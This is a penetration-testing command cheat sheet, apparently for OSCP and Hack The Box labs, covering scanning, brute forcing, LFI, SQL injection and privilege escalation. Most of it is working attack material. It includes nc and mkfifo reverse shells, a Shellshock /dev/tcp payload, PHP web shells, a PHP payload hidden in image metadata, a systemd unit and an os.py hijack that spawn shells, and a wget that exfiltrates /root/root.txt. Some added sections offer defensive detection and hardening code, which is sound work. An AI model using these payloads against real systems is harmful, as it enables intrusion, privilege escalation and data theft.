# PWN skills
## buffer overflow
Ref. https://tech-blog.cymetrics.io/posts/crystal/reverse-01/
Ref. https://tryhackme.com/room/bufferoverflowprep
## base64 decode
`$ cat myplace.backup | base64 --decode > myplace-decoded.backup`
## convert hexadecimal to text
http://www.unit-conversion.info/texttools/hexadecimal/
## cron list
`$ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /var/spool/cron/crontabs/root`
## curl
`$ curl -X OPTIONS -v http://<IP>`
`$ curl -v -X PUT -d '<?php echo system($_REQUEST["cmd"]);?>' http://172.20.10.4/test/hi.php`
Ref. [SICKOS: 1.2](https://hackmd.io/ewCvyV8PSJKaiFkYr5a_8g)
## dirb
`$ dirb http://10.10.10.48 -r -o map.init`
`$ dirb http://192.168.2.196`
## dns
`$ dnsrecon -r 10.10.10.0/24 -n 10.10.10.13`
`$ dig axfr @10.10.10.13 cronos.htb`
## /etc/hosts & dig
`$ host -l cronos.htb 10.10.10.13`
`$ dig axfr @10.10.10.13 cronos.htb`
If the URL only shows the default Apache2 page, add the domain to `/etc/hosts` and check what the site actually serves.

## evil-winrm
`$ evil-winrm -i 10.129.88.189 -u administrator -p badminton`
## exiftool
Embed code in an image file's metadata:
`$ exiftool -Comment='<?php system("nc 10.10.14.15 1234 -e /bin/bash"); ?>' 1.png`
Then rename 1.png to 1.php.png:
```
┌──(root㉿kali)-[/home/kali/reverse_tool]
└─# ls
1.png 1.png_original
┌──(root㉿kali)-[/home/kali/reverse_tool]
└─# mv 1.png 1.php.png
```
## finger user enum
https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
`./finger-user-enum.pl -U /usr/share/wordlists/users.txt -t 10.0.0.1`
## ftp
`$ ftp 10.10.10.3`
```
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||58017|).
150 Here comes the directory listing.
226 Directory send OK.
```
## gcc
`gcc 44298.c -o test`
`chmod +x test && ./test`
## gobuster
Not installed on Kali by default; install it with apt first.
For subdomain enumeration, first download the wordlist from https://gitlab.com/kalilinux/packages/seclists/blob/f8146198d2359eaaabd0bd18b4afa880965449e8/Discovery/DNS/subdomains-top1million-5000.txt
`$ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt -t 200`
`$ gobuster dir -u http://10.10.10.56/cgi-bin/ -x .php,.html,.txt,.sh -w /usr/share/wordlists/dirb/common.txt -t 200`
This one gives a more thorough directory scan:
```
$gobuster dir -u https://10.10.10.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 > gobuster_https.map -k
$gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php > admin_map
```
### Finding txt files
`$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x txt -t 200`
### gobuster subdomain
`$ gobuster vhost -u cronos.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt -t 50`

For port 443, `-k` skips the certificate check.
Ref.[HTB Shocker](https://www.linkedin.com/pulse/hack-box-htb-shocker-walkthrough-abdulhakim-%C3%B6ner/)
## hashcat
`hashcat -m 7400 sunday.hashes /usr/share/wordlists/rockyou.txt --force`
## hydra
`$hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 -t 4 10.10.10.76 ssh`
`$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -V -f http-post-form '/department/login.php:username=^USER^&password=^PASS^:invalid password' -t 64`
`$ hydra 10.10.10.43 -l whatever -P /usr/share/wordlists/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443 -t 64`
## IRC
`$ apt-get install hexchat`
## john
`$ john -w=/usr/share/wordlists/rockyou.txt hash.txt`
## LFI
`http://10.10.10.84/browse.php?file=../../../etc/passwd`
`http://10.10.10.84/browse.php?file=../../../../../etc/passwd`
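The traversal above works because the application joins the `file` parameter onto a base directory without checking where the result ends up. As an added example (not from the original notes), the Python below shows the check a server-side handler should apply before opening a user-named file, plus a detector for log review that also catches URL-encoded and double-encoded variants. `BASE_DIR` and the sample inputs are constructed for illustration.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Constructed for illustration: the only directory the handler may serve from.
BASE_DIR = "/srv/app/files"

# Any path segment that is exactly ".." is a traversal attempt.
_DOTDOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path inside base_dir.

    Returns the absolute path if it stays under base_dir, otherwise None.
    realpath() normalises '..' segments and follows symlinks, so a symlink
    that points outside base_dir is rejected as well.
    """
    if "\x00" in user_path:          # NUL bytes truncate paths in C-based runtimes
        return None
    base = os.path.realpath(base_dir)
    # Drop leading separators so an absolute path is treated as relative to base.
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def is_traversal_attempt(raw_param: str) -> bool:
    """Log-review helper: flag '..' segments, including URL-encoded and
    double-encoded forms such as %2e%2e%2f or %252e%252e%252f."""
    decoded = raw_param
    for _ in range(2):               # decode twice to catch double encoding
        decoded = unquote(decoded)
    return _DOTDOT_SEGMENT.search(decoded) is not None


if __name__ == "__main__":
    for p in ("reports/2024.txt", "../../../etc/passwd", "..%2F..%2Fetc%2Fpasswd"):
        print(f"{p!r:32} resolve={safe_resolve(BASE_DIR, p)} traversal={is_traversal_attempt(p)}")
```

Note that `safe_resolve` strips leading slashes, so a request for `/etc/passwd` is confined to `BASE_DIR/etc/passwd` rather than rejected outright; the detector is what tells you someone tried.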
## md5 hash
https://hashes.com/en/decrypt/hash
## mongoDB
$curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
$tar xvf mongodb-linux-x86_64-3.4.7.tgz
$cd mongodb-linux-x86_64-3.4.7/bin
$./mongo mongodb://{target_IP}:27017
```
> show dbs;
admin 0.000GB
config 0.000GB
local 0.000GB
sensitive_information 0.000GB
users 0.000GB
> use admin
switched to db admin
> show collections
system.version
> use sensitive_information
switched to db sensitive_information
> show collections
flag
> db.flag.find().pretty()
{
"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
"flag" : "1b6e6fb359e7c40241b6d431427ba6ea"
}
>
```
## mysql、MariaDB
`$ mysql -h <IP> -u root`
`show databases;`
```
$use htb;
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.164 sec)
MariaDB [htb]>
```
`SELECT * FROM {table_name};`
`SELECT * FROM config;`
## nc
```
Attacker (Kali):
$nc -lnvp 4444
Target:
$nc <KALIIP> 4444 -e /bin/sh
```
`$ nc -c bash 10.10.14.2 443`
## ncat (SMTP)
`$ ncat 10.10.10.17 110`
```
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
retr 1        (read the first message)
xxxx
retr 2        (read the second message)
```
## nmap
**Run as root whenever possible**
`$nmap -sV -p- 10.129.88.189 --min-rate 10000` ← scan all ports
`$sudo nmap -sS -A 10.129.88.189 -p- --max-rate=10000`
`$nmap -Pn -sC -sV -oA tcp -p- -T4 -vvvvv --reason IP.AD.DR.SS.`
`$nmap -sV -sC -A -Pn 10.10.10.3`
`$nmap -sC -sV -T4 -v 10.10.10.3 -oN init.map`
`$nmap -sC -sV -T4 -v 10.10.10.3 -Pn -oN init.map`
`$nmap -sC -sV -o init.map 10.10.10.76`
```
$nmap -p- --min-rate 10000 10.10.10.76
Once the open ports are known:
$nmap 10.10.10.76 -p 22022,79,111,63550 -A > init.map
```
## nikto
nikto is a tool for finding and checking security issues on web servers. It sends a large number of requests to the target host.
`$ nikto -h http://<IP>`
Ref. [Kioptrix: Level 1](https://hackmd.io/PMATyoQlShqXcryHsQFiaw)
## responder with NTLM
Use responder together with an LFI to capture NTLM authentication.
Ref. https://www.freebuf.com/articles/network/256844.html
First, on Kali:
`$ responder -I tun0`
Then trigger the LFI through the URL:
`http://unika.htb/index.php?page=//10.10.14.20/somefile`
responder then shows the captured response:

## reverse shell
```
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f');
?>
```
## redis
```
$redis-cli -h 10.129.136.187 -p 6379
10.129.136.187:6379> info
```
Get all keys, then read one:
```
10.129.136.187:6379> KEYS *
1) "temp"
2) "numb"
3) "flag"
4) "stor"
10.129.136.187:6379> GET flag
"03e1d2b376c37ab3f5319922053953eb"
10.129.136.187:6379>
```
## rsync
Use `rsync --list-only source` to list all the files in that directory:
```
$rsync --list-only 10.129.90.51::
public Anonymous Share
$rsync --list-only 10.129.90.51::public
drwxr-xr-x 4,096 2022/10/24 23:02:23 .
-rw-r--r-- 33 2022/10/24 22:32:03 flag.txt
$rsync 10.129.90.51::public/flag.txt hihi.txt
```
## samba
smbclient using `-N` for null session (or no auth) and `-L` to list:
`$ smbclient -N -L 10.10.10.3`
Upload with `put`, download with `get`.
`$ smbclient -N '\\10.10.10.3\tmp\'`
```
┌──(root㉿kali)-[~/mywork/friendzone]
└─# smbclient -N '\\10.10.10.123\print$\'
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[~/mywork/friendzone]
└─# smbclient -N '\\10.10.10.123\general\'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jan 17 04:10:51 2019
.. D 0 Tue Sep 13 22:56:24 2022
creds.txt N 57 Wed Oct 10 07:52:42 2018
3545824 blocks of size 1024. 1650472 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
```
```
$nmap --script smb-enum-shares.nse -p445 10.10.10.123
```
## searchsploit
`$ searchsploit PACKAGE_NAME`
`$ searchsploit wp support plus` (when searching for the wp-support-plus plugin, separating the words with spaces worked)
`$ searchsploit -m NUMBER` (download the exploit)

## shellshock
`$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.5/4488 0>&1' http://10.10.10.56:80/cgi-bin/user.sh`
Note: if you get `zsh: no such file or directory: /dev/tcp/`, switch to root and try again.

Ref. [HTB Shocker](https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-shocker/)
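From the defender's side the same request is easy to spot: the `() { :; };` function-definition prefix has no legitimate reason to appear in an HTTP header. The following Python is an added example (not part of the original notes) that scans Apache combined-format access logs for that pattern in the User-Agent, Referer and request-line fields and reports whether the target was a CGI script. The log lines are constructed samples, not real traffic.

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache "combined" format; not real traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Oct/2022:13:55:36 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -c 'id'"
10.10.14.9 - - [10/Oct/2022:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 3412 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.5 - - [10/Oct/2022:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 500 57 "() { ignored; }; /usr/bin/id" "curl/7.68.0"
"""

# Apache combined format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock trigger: an exported-function definition "() { ... }" followed by
# further commands after the closing brace. Whitespace inside is attacker-controlled.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """Return one record per log line whose UA, Referer or request line
    carries a Shellshock-style payload."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not combined format; skip the line
        for field in ("ua", "referer", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                parts = m.group("req").split()
                path = parts[1] if len(parts) > 1 else ""
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "path": path,
                    # CGI scripts are the usual exposure point for this bug
                    "cgi_target": path.startswith("/cgi-bin/"),
                    "status": m.group("status"),
                })
                break                          # one record per line is enough
    return hits


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["field"]:8} {h["path"]} '
              f'cgi={h["cgi_target"]} status={h["status"]}')
```

The fix is a patched bash; the quick host-side check is `env x='() { :;}; echo vulnerable' bash -c 'echo test'`, which prints only `test` on a patched build. Until then, disabling the CGI handler that the hits point at limits the exposure.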
## ssh
Use a private key to log in:
`$ ssh -i id_rsa`
## steghide
Images:
```
$apt-get install steghide
$steghide extract -sf irked.jpg
```
## strings
`$ strings /dev/sdb`

## sql
[MySQL SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
https://ivanitlearning.wordpress.com/2020/10/14/hackthebox-jarvis/
```
to enumerate the number of columns:
ORDER BY n--
UNION SELECT 1,2,3,4,5,6,7--
```
group_concat(user,password)
http://jarvis.htb/room.php?cod=0 UNION SELECT 1,group_concat(user,password),@@version,@@hostname,user(),6,7 FROM mysql.user--
Ref. [https://mariadb.com/kb/en/group_concat/](https://mariadb.com/kb/en/group_concat/)
## sql injection
```
' OR 1=1 --
admin'#
admin'
'1'='1
```

https://www.gushiciku.cn/pl/pXfm/zh-tw
Ref. [Kioptrix: Level 1.1](https://hackmd.io/Lzfog-wgSDu1yO7130zGcg)
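These payloads only work when user input is spliced into the SQL string. As an added example (not from the original notes), the Python below builds a throwaway SQLite database with constructed users and runs the payloads from this section against a concatenating login and a parameterised one, so the difference is visible in code. The table, user names and passwords are all constructed.

```python
import hashlib
import sqlite3
from typing import Dict, Tuple

# Constructed demo users; the passwords are made up for this example.
DEMO_USERS = [("admin", "correct horse"), ("bob", "hunter2")]


def _hash(password: str) -> str:
    # Demo only: production code should use a salted, slow KDF (bcrypt/argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [(u, _hash(p)) for u, p in DEMO_USERS],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # VULNERABLE: the username is spliced straight into the statement, so a quote
    # in the input changes the query structure ("' OR 1=1 --" comments out the rest).
    query = "SELECT id FROM users WHERE username = '%s' AND password_hash = '%s'" % (
        username, _hash(password))
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # FIXED: placeholders send the values separately from the statement text,
    # so the input is only ever compared as data, never parsed as SQL.
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row is not None


def run_payloads(conn: sqlite3.Connection) -> Dict[str, Tuple[str, str]]:
    """Run the cheat-sheet payloads through both versions.

    Result words: 'bypassed' (logged in without a valid password), 'denied',
    or 'sql error' (the input broke the statement, which is itself something
    to alert on in database error logs).
    """
    payloads = ["' OR 1=1 --", "admin'#", "admin'"]
    results: Dict[str, Tuple[str, str]] = {}
    for p in payloads:
        outcome = []
        for login in (vulnerable_login, safe_login):
            try:
                outcome.append("bypassed" if login(conn, p, "not-the-password") else "denied")
            except sqlite3.Error:
                outcome.append("sql error")
        results[p] = (outcome[0], outcome[1])
    return results


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in run_payloads(db).items():
        print(f"{payload!r:16} concatenated={vuln:10} parameterised={safe}")
```

MySQL treats `#` as a line comment, which is why `admin'#` is on the list; SQLite has no `#` comment, so here that input surfaces as a syntax error instead of a bypass. Either outcome is only possible with concatenation, and a burst of malformed-query errors from a login endpoint is worth an alert in its own right.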
## sqlmap (banned in the OSCP exam)
`$ sqlmap -u "http://172.20.10.5/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 --risk=3 -D jabcd0cs -T odm_user -C id,username,password --dump --batch`
## SUID
Looking at SUID binaries, the `systemctl` program stands out since it's not normally SUID:
`$ find / -perm /4000 2>/dev/null`
or
`$ find / -perm -u=s -type f 2>/dev/null`

Write your own service unit that `systemctl` can run to escalate privileges. Name it 666.service with the following contents (the case of the keys matters):
```
[Unit]
Description=test
[Service]
ExecStart=/bin/nc -e /bin/bash 10.10.14.14 7788
[Install]
WantedBy=multi-user.target
```
Then:
```
$systemctl enable /home/pepper/666.service    (the full path is required)
$systemctl start 666.service
```

## password hash
Free Password Hash Cracker: https://crackstation.net/
## password cracker
fcrackzip must be installed first (on Kali: `apt-get install fcrackzip`)
`$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace-decoded.backup`
## php
Think in the direction of LFI.
`<?php system($_GET['cmd']);?>`
## pop3
`$ telnet 10.10.10.51 110`
```
USER james
PASS james
list
+OK 1 743
1 743
retr 1
```
`list` shows the messages; `retr 1` shows the contents of message 1.
## proxytunnel
`$ proxytunnel -p <IP:3128> -d 127.0.0.1:22 -a 666`
Ref. [SKYTOWER](https://hackmd.io/Ns7Dc1I9SwOxNFdvG3-_Jg)
## proxychains
https://0xdf.gitlab.io/2018/09/08/htb-poison.html
```
$ cat /etc/proxychains
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
```
First terminal:
`kali@kali:$ ssh charix@10.10.10.84 -D 9050`
In another terminal:
`kali@kali:$ proxychains4 vncviewer 127.0.0.1:5901 -passwd secret`
## pspy
[Pspy - Monitor linux processes without root permissions](https://github.com/DominicBreuker/pspy)
After downloading, `chmod +x` it and run:
`$ ./pspy32`
## python
But I noticed that it's importing the os library. Usually python libraries are only writable by root, but I checked os.py and friend had permissions to write to it:
```
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os
-rwxr-xr-x 1 root root 4635 Apr 16 2018 os2emxpath.py
-rwxr-xr-x 1 root root 4507 Oct 6 2018 os2emxpath.pyc
-rw-rw-r-- 1 friend friend 476 Jul 12 14:39 os.py
-rw-r--r-- 1 root root 1187 Jul 12 14:40 os.pyc
```
So I just put those two lines at the bottom of os.py:
```
import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 5566 >/tmp/f')
```
## python http
Remember to run the command from the directory whose files you want to serve, so the listing shows the files in that folder:
`/var/www/html` or your home directory
```
┌──(root㉿kali)-[/var/www/html]
└─# python2.7 -m SimpleHTTPServer 5555
┌──(root㉿kali)-[/home/kali]
└─# curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.6:5555/
```
## wget
```
$sudo wget http://10.10.14.2:4444 --post-file=/root/root.txt
kali@kali:$ nc -lvp 4444
```
## wordpress
### wpscan
`$ wpscan --url https://brainfuck.htb --disable-tls-checks`
`$ wpscan --url http://tartarsauce.htb/webservices/wp > wpscan.map`
```
Scan WordPress plugins:
$wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive -t 200 > wpscan_plugin.map
```
## xfreerdp
`$ xfreerdp /v:10.129.154.204 /cert:ignore /u:Administrator`
## Getting an interactive shell
$python -c 'import pty; pty.spawn("/bin/bash");'
$python3 -c 'import pty; pty.spawn("/bin/bash");'
```
https://gtfobins.github.io/gtfobins/tar/#sudo
$sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```
## Privilege escalation
`$ python -c "import crypt; print crypt.crypt('password','password')"`
`$ sudo useradd -m -G root,sudo -p papAq5PwY/QQM vulnhubroot`
## Privilege escalation - sudo
`$ sudo -u username /bin/bash`


`$ sudo -l`
* e.g. when perl is allowed to run as root
`$(/bin/bash)`
## Finding writable files
`find / -writable -type f 2>/dev/null`
`find / -perm -u=s -type f 2>/dev/null`
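The two `find` one-liners above, the SUID `systemctl` case in the SUID section and the group-writable `os.py` in the python section are all the same kind of permission-audit check, which a blue team wants to run repeatedly and diff against a known-good state. As an added example (not from the original notes), the Python below performs both audits and compares the SUID list against a baseline. `SUID_BASELINE` and `LIBRARY_ROOTS` are constructed placeholders to be replaced with values recorded on a clean install.

```python
import os
import stat
from typing import Iterable, List, Set

# Constructed placeholder baseline: record the real list on a known-clean host.
SUID_BASELINE: Set[str] = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}

# Constructed example of library roots to audit; adjust to the interpreter in use.
LIBRARY_ROOTS = ["/usr/lib/python3"]


def is_suid(mode: int) -> bool:
    """True if st_mode describes a regular file with the set-user-ID bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def is_risky_library_file(st_uid: int, mode: int) -> bool:
    """A module owned by a non-root user, or writable by group/others, lets that
    user run code inside every process that imports it (the os.py case above)."""
    writable_by_nonowner = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    return stat.S_ISREG(mode) and (st_uid != 0 or writable_by_nonowner)


def unexpected_suid(found: Iterable[str], baseline: Set[str]) -> List[str]:
    """SUID binaries present now that were not in the recorded baseline."""
    return sorted(set(found) - baseline)


def _walk_files(roots: Iterable[str]):
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    yield path, os.lstat(path)   # lstat: do not follow symlinks
                except OSError:
                    continue


def find_suid(roots: Iterable[str]) -> List[str]:
    return sorted(p for p, st in _walk_files(roots) if is_suid(st.st_mode))


def find_risky_library_files(roots: Iterable[str]) -> List[str]:
    return sorted(p for p, st in _walk_files(roots)
                  if is_risky_library_file(st.st_uid, st.st_mode))


if __name__ == "__main__":
    suid_now = find_suid(["/usr/bin", "/usr/sbin", "/bin", "/sbin"])
    for p in unexpected_suid(suid_now, SUID_BASELINE):
        print("SUID not in baseline:", p)      # a SUID systemctl would be listed here
    for p in find_risky_library_files(LIBRARY_ROOTS):
        print("writable/non-root library file:", p)
```

Running this from cron and alerting on any non-empty output turns the one-off `find` into a control; the `systemctl` and `os.py` cases from earlier in these notes would both be reported on the first run after the change.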
###### tags: `command` `OSCP`